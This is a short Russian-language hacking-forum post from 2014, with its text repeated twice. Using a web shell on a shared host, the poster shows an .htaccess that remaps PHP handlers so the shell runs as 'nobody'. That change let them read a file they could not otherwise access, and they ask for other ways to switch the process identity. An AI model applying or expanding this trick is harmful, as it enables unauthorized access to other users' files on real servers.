ewi
22.05.2014, 10:13
Бывают случаи вот такие:
$ ls -la
somefile -rw----r-- root/ftpuser
$ id
uid=12345(12345) gid=543(ftpusers) groups=543(ftpusers)
Как то случайно я вбил в папку с шеллом вот такой .htaccess:
php_flag engine on
RemoveHandler .php .phtml .htm .html .php3
AddType application/x-httpd-php .php .htm .html .phtml
Получилось что то вроде этого:
$ id
uid=?(nobody) gid=?(nobody) groups=?(nobody)
Дальше понятно, что файл свободно открылся
Может это и частный косяк админа, но есть же и другие способы сменить id?
$ ls -la
somefile -rw----r-- root/ftpuser
$ id
uid=12345(12345) gid=543(ftpusers) groups=543(ftpusers)
Как то случайно я вбил в папку с шеллом вот такой .htaccess:
php_flag engine on
RemoveHandler .php .phtml .htm .html .php3
AddType application/x-httpd-php .php .htm .html .phtml
Получилось что то вроде этого:
$ id
uid=?(nobody) gid=?(nobody) groups=?(nobody)
Дальше понятно, что файл свободно открылся
Может это и частный косяк админа, но есть же и другие способы сменить id?